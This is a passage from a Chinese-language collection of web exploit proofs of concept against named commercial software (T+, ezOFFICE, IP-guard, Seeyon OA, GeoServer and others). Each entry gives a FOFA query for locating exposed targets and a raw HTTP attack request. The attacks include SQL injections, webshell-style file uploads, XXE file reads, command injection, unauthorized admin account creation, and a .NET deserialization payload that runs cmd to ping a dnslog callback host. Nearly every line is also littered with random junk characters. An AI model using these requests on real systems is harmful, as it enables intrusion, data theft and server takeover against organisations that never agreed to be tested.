. F4 M- ?" X+ `- a# x" dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
$ L$ c- R/ [/ O6 l1 ~8 i% T3 z* I1 RContent-Type: application/json
" y {0 z* H1 @: ^& K* ?# q9 Z1 e4 S; q0 s% T
{, l6 x6 V0 l+ r- i: p1 r/ B9 q4 }2 ~
"storeID":{9 J, S& g1 l4 ~' h1 { X
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
( [! h# Q; d. }0 `3 i "MethodName":"Start",
6 m7 U9 e* v% L* l4 k "ObjectInstance":{/ G1 ^ M; U4 Z7 N
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
, e3 J, ]4 c9 M& w; t- A$ ` "StartInfo": {
0 S# |4 ?& E) h u( m "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
! w& m. B5 Q W- h# Y "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
i5 n% {. N$ m; T7 G' c }# w C) h7 z% o- G
}6 L4 h: {# x1 o* @( o5 f+ o
}
; r" w, j( C/ i3 s}
: D" y3 p: ]2 d7 q
' K% k" s0 k7 @4 `
0 \) K+ Y Y( D+ S57. 畅捷通T+ keyEdit.aspx SQL注入
H$ r7 H7 \4 AFOFA:app="畅捷通-TPlus"0 V$ m# x V% L [6 w5 g
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.16 ]- c: C6 h8 ?
Host: host' N$ R( D8 N+ X2 B1 ^0 j
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36* N/ w2 p. t* Z- p: \& b! D
Accept-Charset: utf-8
9 ^/ \1 D, ^1 H0 W6 OAccept-Encoding: gzip, deflate# w2 _$ E0 V3 C* F' F/ N
Connection: close
. @# }- s9 {0 J7 G" F* r- K+ D$ n, a% ?9 r& M# x6 _
2 P1 T* e+ h6 b5 B5 w8 Z9 T' L5 Z X58. 畅捷通T+ KeyInfoList.aspx sql注入
T/ |4 c; b/ C1 l' G! E$ k2 wFOFA:app="畅捷通-TPlus"& S* h/ @; ?( z& W6 C
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1+ z& l) K2 u8 w; r: `( g6 `: Z9 K1 C
Host: your-ip# M+ h, o- e' ^. C3 U
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
0 B4 I5 f' v) }4 W. uAccept-Charset: utf-8" B& ?: J" ]" Y [* P( Z& O$ P$ f: x
Accept-Encoding: gzip, deflate
3 V# O1 `) N3 m8 n' |( qConnection: close! j5 D, {9 T& c( J+ K: Z
" u, H2 z1 c6 {3 M4 u0 x
3 x% Z% a2 m* _/ X
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
. \4 h0 X: h, i) v7 k+ SFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"- L# x1 X; Q" ?
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.13 w- m& U3 E: E% \
Host: 192.168.86.128:9090- a7 f+ c3 Z. w+ ~) d, Q
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.361 \# K/ Y( i% g8 G% e8 G" P
Connection: close h& x. `2 c! x: [# m/ ~4 Z
Content-Length: 1669
0 O) l8 d9 _( xAccept: */*
+ W/ B1 @$ Y; n3 p" f. |4 u! zAccept-Language: en- h5 N- }- V0 [' U5 }$ d9 k
Content-Type: application/x-www-form-urlencoded
' @: x1 P% \& Y2 x3 ?( N7 r- \- JAccept-Encoding: gzip
! E& L, A; Z: q& k) ?) t; C" z$ {7 C8 ~' z( J; V) g4 [
PAYLOAD. P r# e; W5 A% m
3 W" @3 V1 r6 U- Z" h. ]+ w
* b1 X# g* Q# `- _0 M" N' ]60. 百卓Smart管理平台 importexport.php SQL注入9 d+ Y8 S2 c+ C' Z$ R6 V
FOFA:title="Smart管理平台"
4 r0 r- S. J F6 Q, J: jGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
, l, i: O; Y4 l/ BHost:
1 E* V9 U7 |! F, \* TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 [1 B) r' J1 j" K( xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, ~$ g. _' ]* z9 T# M/ h9 oAccept-Encoding: gzip, deflate
( p) @9 s! t8 I! K5 K- C# c$ bAccept-Language: zh-CN,zh;q=0.9
% w% D2 q* Z( Q5 I, jConnection: close
; X8 \9 x% w- O1 c7 j7 \( g( ~0 i3 c; x7 h0 j' m' h) a
% @& f/ S& z* E6 D* K; H: C) a61. 浙大恩特客户资源管理系统 fileupload 任意文件上传: S3 r" V) N8 [1 m
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
5 @/ R' J0 G2 Y, h* u' p9 ~. r- ~POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
% [7 w# f3 Y! ~% c7 PHost: x.x.x.x, O! W" G7 O7 h* w5 F( f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
t/ \6 i ?: a; [% o" SConnection: close
4 s' D/ s$ j4 q+ [1 b* FContent-Length: 27
5 C5 s5 b6 Y9 z# k7 Q7 X9 @# kAccept: */*
# u F. m1 I2 g. s6 w% m) i1 _( Q+ dAccept-Encoding: gzip, deflate
$ S4 r+ Z" T, `* bAccept-Language: en
2 V! S" B2 N$ u- A5 w6 l( wContent-Type: application/x-www-form-urlencoded
0 c w# c& u% z! ~( v- |7 T$ o! K: `
8uxssX66eqrqtKObcVa0kid98xa
) T7 m% e7 t8 u8 D2 k- [
7 ?9 R* Q! Q7 x+ A5 q- z+ s. F5 ~9 W$ u, M3 F0 T' o9 c
62. IP-guard WebServer 远程命令执行, K u' p$ R& n4 ?" s
FOFA:"IP-guard" && icon_hash="2030860561"
5 Y$ \% Z8 X& @; r0 LGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.10 {+ z+ ?8 I" A. x/ `0 [* u
Host: x.x.x.x5 l% k/ }7 ^0 g L- s/ x$ y
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.365 o2 `" O8 }8 [! ?9 R; Q, y
Connection: close- H' \4 b9 J: O2 Y5 I& m
Accept: */*4 V9 f b$ c: |9 _7 t+ m, Z9 u
Accept-Language: en1 K \ {6 w3 d& j8 ^
Accept-Encoding: gzip9 Q% J, o; ^3 ~* r
. H& p9 ~' l7 b: G4 F4 N; e. h$ E: d% q4 X
访问
! }, ?$ q7 q+ d, i0 n+ q- |1 ^5 f3 P+ m1 E
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1! T/ \: T' L2 p+ Z
Host: x.x.x.x: d& }6 s5 d, q3 m; `& L
( @, K! X( ^2 L) k" ~$ s g
% b1 A3 U9 Y5 B& d3 r
63. IP-guard WebServer任意文件读取8 w" h0 Q2 o3 {* H7 [$ @
IP-guard < 4.82.0609.0
$ g2 s* F9 B- X& F$ Y1 W! pFOFA:icon_hash="2030860561"% t0 ?- L! d# M" o
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.18 E. Q. Y% p5 s
Host: your-ip0 E$ e- a9 M& Y; S- m- m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
' O- G/ ~$ D A$ j$ L% u' B2 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 X6 l) g4 I* O! N
Accept-Encoding: gzip, deflate
. d5 H- P0 \3 y0 ?3 yAccept-Language: zh-CN,zh;q=0.99 c" v4 {9 q' J
Connection: close
$ j# P1 d. W- e b& G" |8 ~Content-Type: application/x-www-form-urlencoded- @! c6 m3 j" h' e& ]
; U9 m1 O7 @! T, w7 J% j# f+ qpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
. f' Q- c U5 ^% r7 R+ U' X
/ _; s5 \: r9 d4 O1 y1 n Q- z8 T64. 捷诚管理信息系统CWSFinanceCommon SQL注入# W- b8 y) G1 [" z& D
FOFA:body="/Scripts/EnjoyMsg.js"
5 C3 I1 o: x# ?' {) ^! o3 Q! zPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
% X. n4 G; Z5 W! z6 zHost: 192.168.86.128:9001
4 V, C- Y. `( b+ f% \9 {# _User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36& N2 H. G, r6 {7 |4 w# c0 X2 T0 R
Connection: close$ O* X: p' s5 J' R1 B U
Content-Length: 369
* L- P1 B. O! l) z0 ~) O! P" XAccept: */*' ?) O3 S+ q9 b! z- h+ i
Accept-Language: en
* T3 H5 M9 y5 _( k$ _Content-Type: text/xml; charset=utf-86 y( ]! O# g! [. S( [. T$ R. ?
Accept-Encoding: gzip
& W6 M7 ?- d; @5 H/ F K: |% H2 K- X6 Z1 H
<?xml version="1.0" encoding="utf-8"?>
; c) u" G t& K4 t& T2 {# c<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">0 g3 W5 B: Q( `6 d
<soap:Body>7 E) V0 Z% }& a+ b) d+ m
<GetOSpById xmlns="http://tempuri.org/">
6 |, P, G$ x- N0 H h <sId>1';waitfor delay '0:0:5'--+</sId>1 L9 h# }+ M: P; t8 x4 f& @/ [
</GetOSpById>9 |: A/ m7 |- Q% ]
</soap:Body>
- M' N; w: T$ {( b& D' {</soap:Envelope>2 r; A! I2 w) T! f% j7 F" s
* d+ }+ o, k: c9 d. X" u3 f: P. Z/ W/ M1 [
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过" U' ~; `8 P# E/ ^
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
. V4 P2 x, m% m1 O! `响应200即成功创建账号test123456/123456
) k" ~2 M; q6 }, I) T- gPOST /SystemMng.ashx HTTP/1.11 F5 D" |( \6 ]- }
Host:
7 H3 K- e, a4 O9 j& j+ IUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)( m# _$ I% s$ z6 I3 q. X
Accept-Encoding: gzip, deflate7 W& x# `3 I6 y! E5 e- ?2 d( k
Accept: */*
# P' o* T3 w( |' w* MConnection: close
( z4 P4 f) l: i; H8 T; I3 A" QAccept-Language: en L3 S" Z0 o1 [
Content-Length: 1749 P5 ^/ f) W, y7 `
$ _3 M P" n- X7 C+ W3 Z
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
) d& f# Q- H \8 `5 K
5 J7 {. D* S2 s/ w+ g1 R0 v7 M
( j4 u& ?0 u+ s# e! l4 S66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入. S) P9 f& q$ s
FOFA:app="万户ezOFFICE协同管理平台"# e+ U- E# b- ~* C/ G+ `* K, L
3 c7 k" y( ?! \2 c0 U4 n+ s1 [6 z3 t
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1, @5 Q, j8 I; j
Host: x.x.x.x
& B. I. R; m- i. gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36- j0 h% B, O; p7 C. K' Y
Connection: close1 E, J( K, K$ \8 P l
Accept: */*9 \$ f! l' d5 M& ~7 L7 j4 U* I. k
Accept-Language: en
' p6 y6 j3 X ?# w R; z7 d' bAccept-Encoding: gzip1 S7 G# d9 m$ j$ Q
- z% t! Q$ B0 l0 `6 ]& O0 U
! }7 ~1 [# c9 D! J1 N( [% n第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在- r( X8 S x& h( p
0 o/ j6 i: x8 x( [/ D
67. 万户ezOFFICE wpsservlet任意文件上传2 _; G& k. V6 S& i6 ?3 _+ ^
FOFA:app="万户网络-ezOFFICE"
. C- z" d3 ~) Y9 YnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型) i" }, u3 V% ?( O6 d
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
3 k8 q) p; }1 D$ Y; e; }( m; q+ jHost: x.x.x.x/ E8 l( c5 {8 Q0 K) E1 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
1 c! f+ H: K/ h5 YContent-Length: 173
5 b; ^6 U. {5 ]5 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' j2 N, L0 r3 B/ ]3 D/ c
Accept-Encoding: gzip, deflate$ N# n. T! n8 }: f) B4 M+ g
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
8 Y# s* N- c# n0 {/ l' r( u( ]Connection: close: ?" C3 @ }2 O- S# }: f3 I
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
" ~( }4 |, a' c( [1 J" ^' [DNT: 10 [& G+ A* h! G$ `( H" R
Upgrade-Insecure-Requests: 1
1 _" g- c1 `1 [4 h
4 M6 K$ x' N6 I--ufuadpxathqvxfqnuyuqaozvseiueerp
) t3 e0 o* x' e; k+ M4 TContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"% F+ U% K; ?, D1 Z
. X( N2 i8 N- ~- H9 o+ U7 o<% out.print("sasdfghjkj");%>
3 J7 I8 U- F6 Z+ _--ufuadpxathqvxfqnuyuqaozvseiueerp--
. r" W/ E1 G- P$ V
& b4 G* G* }/ f) s
9 E" J/ _, P/ ?( x6 D6 z% U9 C文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
# _, m# e3 `( U' g# U7 @
2 |5 p0 R$ E" `68. 万户ezOFFICE wf_printnum.jsp SQL注入) j3 l4 m2 ~: h% K' N# }) s
FOFA:app="万户ezOFFICE协同管理平台"
9 U$ }" \. f) ]; }* TGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.17 K- _- \; d' T7 v% f
Host: {{host}}
% h6 P+ r3 \6 I& B* DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.369 }" d. k6 S- w6 X1 H
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
0 l9 k7 C2 s3 S7 ^& L& o/ YAccept-Encoding: gzip, deflate
/ i$ [# g- j4 L WAccept-Language: zh-CN,zh;q=0.9
* K. q8 n4 |, c' q2 lConnection: close5 G- u# ]; t% _/ I& _
, ~8 J v z |0 e4 w
1 C* ~' a. @# X9 J( ?6 A+ L$ F69. 万户 ezOFFICE contract_gd.jsp SQL注入& v- H, ]3 X; J$ p
FOFA:app="万户ezOFFICE协同管理平台"( `2 T) C: b1 ?% S3 R- n1 `
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1* [! p) s" g% M
Host: your-ip+ ?7 K4 h4 K7 _ c _- |
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
% s* W0 G e1 M& s( l/ c# _; zAccept-Encoding: gzip, deflate0 t" R' W/ G7 B( j U! i
Accept: */*1 h* t8 u1 v, f
Connection: keep-alive7 P# _ N2 @1 ^' d8 H) k
4 m, W6 w5 U& I5 f
# T3 W, z! \. b3 H70. 万户ezEIP success 命令执行# p6 V% _$ `: K. U
FOFA:app="万户网络-ezEIP"
* d. W2 `6 u* _2 Q3 PPOST /member/success.aspx HTTP/1.16 j3 [, w! P3 z: b2 V* n1 u
Host: {{Hostname}}
. ^+ t4 t, q p5 i& L- J* \( WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
* p8 \0 m% ^4 ^4 {* X) aSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
) w, @8 X, g' t/ s! Z D$ }0 x2 ~Content-Type: application/x-www-form-urlencoded1 ?- [0 Q) X$ x" M" E8 c u5 ]
TYPE: C
6 S9 @: M; I b$ k8 PContent-Length: 167027 u8 v+ O! `5 K4 d8 b5 w
$ Z `& @1 a5 J0 f2 f6 i__VIEWSTATE=PAYLOAD
' p( }/ M* C1 a" e
P* m) e/ k* d) H8 K2 u* K/ u! ~5 U2 c
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入/ d0 L1 y6 f. o3 ]1 D+ R* x, s
FOFA:body="PM2项目管理系统BS版增强工具.zip") O& H7 @' ~! s' @
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
7 b; J6 U- @; [6 @: DHost: x.x.x.xx.x.x.x$ I* W. ?. }( p
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
0 {/ d0 G: E* J1 N7 e- y/ l2 uConnection: close8 [& ~5 s6 i# F- T6 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 A7 e' G3 ]8 N
Accept-Encoding: gzip, deflate- v g+ A7 l& u, {8 Z) N2 H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& U2 M* d) s) n- z, k4 b
Upgrade-Insecure-Requests: 1 I$ A6 C- _" g q' j" N
7 c* C: [, g9 L* ^' u$ x( d' q
6 O1 \" M6 H5 e l4 N) s' _# v1 H
72. 致远OA getAjaxDataServlet XXE8 H, }$ R; h1 Z7 V: t( K
FOFA:app="致远互联-OA"& N0 E- C) e- K. Z, C2 V
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
! S) W/ E+ h+ D2 H, U' ZHost: 192.168.40.131:80998 W# ^3 ^; M6 P4 o% _; R: r5 S8 b
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36: e+ X" l/ \5 K! \
Connection: close
9 t: m/ E! G( N# S3 m/ p+ hContent-Length: 583' }: W H6 }+ h1 n! m% C
Content-Type: application/x-www-form-urlencoded% ? Z1 L; D0 g$ c
Accept-Encoding: gzip" a2 ~9 z* O' ~+ I7 `; Q- h, k
6 N# L" j6 m" s, ?. NS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
8 x0 h& Y- e5 _7 Q- F+ p" M! f
" M* P3 X& T# F/ E, D
) {- u. `* Q5 Z( y# I3 M73. GeoServer wms远程代码执行
3 C5 ~+ i0 v- hFOFA:icon_hash=”97540678”
2 K" ~* P( Z8 G8 pPOST /geoserver/wms HTTP/1.15 V. v! f$ J; F
Host:4 ?9 \- ?- `2 Y% V7 m$ D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36* i v7 i# ?* t& G1 y
Content-Length: 1981
2 O( k1 F; M# U, BAccept-Encoding: gzip, deflate* @. {' d+ Y$ |* T# Z& V1 R
Connection: close7 e. g. ^; J. g2 y; K& C# E
Content-Type: application/xml
; p7 S$ _' a5 j# d& l9 F- ~SL-CE-SUID: 3# p' ?& F4 V2 G. U
: |1 ?" A, A3 iPAYLOAD8 {% [" K: G6 ~& }
* \9 x5 r7 E6 q1 z
- S' i; x/ y7 j% l$ X! v3 `74. 致远M3-server 6_1sp1 反序列化RCE
$ c8 p$ ?& s# y$ R, }FOFA:title="M3-Server"4 W1 E. |% h4 L2 H4 _& L, e3 n
PAYLOAD
" ^9 ]9 a/ O' O% ?) A6 I4 }- m7 s* {9 u! e6 b% L
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
3 I+ A0 p- v. C/ cFOFA:app="TELESQUARE-TLR-2005KSH"
0 g! _' ]( ?: P. k3 m0 rGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1' h0 _& {) ?2 \% i" q
Host: x.x.x.x
5 s' Z" C' i" o# z& B$ GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# c F1 u4 q$ K$ bConnection: close
9 P1 a& _! }9 L' ~$ |% JAccept: */*
4 a! X- l) M- i. k+ BAccept-Language: en7 ]' h% d6 J" V3 Y& F2 Z4 t
Accept-Encoding: gzip0 H: E5 }. A6 x# f# A! @
( }9 K' Q4 \! H0 x6 \# R/ s
) i, F6 F# x: I% n/ Q( R
GET /cgi-bin/test28256.txt HTTP/1.1
# j& V. d& `9 H* y2 {; w/ NHost: x.x.x.x
& Y5 E( K. J5 \6 M% S
# x* W& n- g, |
* \- x& g7 v* ?. J2 e76. 新开普掌上校园服务管理平台service.action远程命令执行
6 V6 r& I4 @! L7 B2 \/ o [, v fFOFA:title="掌上校园服务管理平台"% e' ~# r |$ V- {6 T4 [
POST /service_transport/service.action HTTP/1.16 J2 y t4 F3 t3 y- o7 ^
Host: x.x.x.x' O) @- h: T, k7 i/ U* n' z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
' X4 s- t& G" \& a0 R7 rConnection: close
# j+ j. ~! F7 q1 f. U# qContent-Length: 211
, d) B0 ?6 r! J. t& B9 E% `! mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ K. J8 o8 L0 `
Accept-Encoding: gzip, deflate
* \: j' `& `7 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% I E1 J K* q: P, b9 ?* h5 bCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
E$ H) R: I% s H8 u ~Upgrade-Insecure-Requests: 1( a7 h* a( p7 f* ]
5 u. Q, C' w# k* W% O# A
{2 }. v( I( M7 j) @' p/ p
"command": "GetFZinfo",
5 ~! g7 M" g" o7 a5 X "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\" {7 P2 _5 Y6 G8 @
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}": y/ f2 t* ^/ } R [+ Z
}
2 u' z% ^8 |: j7 B9 X0 E0 y) P4 C z+ w- q* K$ x
5 a* u% M+ r ]3 Q4 I) D' e5 SGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1# U. T# e, H2 U0 ^7 L0 A3 p
Host: x.x.x.x& m) r+ I5 @5 R7 c7 [/ R q, |9 s
. \5 k! f" j3 ?- t
8 t; e: k0 @1 A
1 H6 v% D+ Y, N F, h77. F22服装管理软件系统UploadHandler.ashx任意文件上传, a1 T3 `+ e6 T5 J& @) c
FOFA:body="F22WEB登陆") ?$ H/ ^" ]/ k( ~/ ]/ x J
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.12 I& Y9 |) W4 J. C) `. L/ D
Host: x.x.x.x
) ~) b! f7 e f7 e% S. F: cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
& a2 j. d6 d) J7 j* xConnection: close
1 q4 Z) N5 k+ R& x; \* p3 SContent-Length: 433
2 X1 o/ n& f& C2 e8 l' JAccept: */*. l* L; F" S4 p4 D( B9 U" D$ x0 f
Accept-Encoding: gzip, deflate
# U' X; r) x0 FAccept-Language: zh-CN,zh;q=0.9
# u0 s+ v0 a, q, xContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
% B0 Q1 p4 P# ^6 A% X( i& N$ i* J5 z7 O2 O2 _; z6 [
------------398jnjVTTlDVXHlE7yYnfwBoix1 m5 H5 c$ P" W" u) A) T
Content-Disposition: form-data; name="folder"
! m8 ]" b6 m. B4 V/ p4 O: b" R9 b: G. j1 E( R2 L
/upload/udplog
" X1 f7 F0 L, E9 e9 {2 `$ i& {. E------------398jnjVTTlDVXHlE7yYnfwBoix8 I' j* o; h6 f3 L
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"' x" k+ b5 h/ q: J$ @. t' p9 o2 W
Content-Type: application/octet-stream t+ C9 c- U, |7 H% F
) V" L+ H; A4 Q7 X! C
hello1234567
& k4 \$ `. X, S' l6 X' F9 ^' Y3 g6 @------------398jnjVTTlDVXHlE7yYnfwBoix0 u: S, z7 _: e4 V
Content-Disposition: form-data; name="Upload"
0 I: S5 e. P. f1 R, Y! ?
! j; k5 q) W; h7 J3 v3 g+ GSubmit Query+ v) j( M! t# _+ S, u
------------398jnjVTTlDVXHlE7yYnfwBoix--6 k3 l( f9 \) B" G8 z, X9 m
! G5 K* o0 U) c: ?1 d# `
- `/ t/ l W% h1 P- H; R78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传+ O' P- W+ A3 q/ [! ^4 k0 i
FOFA:icon_hash="2001627082"- C. V" v* m; d* u9 n
POST /Platform/System/FileUpload.ashx HTTP/1.17 O' U7 a: e" `9 r ]$ D
Host: x.x.x.x
1 E4 V+ K7 z& z8 `+ T8 aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; g& J' |3 h$ AConnection: close/ p9 S r, _/ v3 {( e; o
Content-Length: 3365 B$ |$ Y: M, K9 w8 K% ?- L/ \9 K
Accept-Encoding: gzip4 D! ~, z9 x0 Z; M! F m" l! F2 v
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
3 N- M( d) G3 @. S
# _: r7 f* n' c# X4 D+ S' ~------YsOxWxSvj1KyZow1PTsh98fdu6l
5 L6 Q7 u: d+ |9 SContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
' N- Z6 N7 U9 KContent-Type: image/png# u; F2 h2 m7 |: Y- R8 I( w
& Q! ?1 q h3 U+ I0 q+ |9 H' eYsOxWxSvj1KyZow1PTsh98fdu6l
5 `- _ q2 r/ c2 m% `# p% X8 F------YsOxWxSvj1KyZow1PTsh98fdu6l
$ i y* t$ J# u# f+ V2 ?4 g; lContent-Disposition: form-data; name="target"1 P5 P$ V- q2 Q
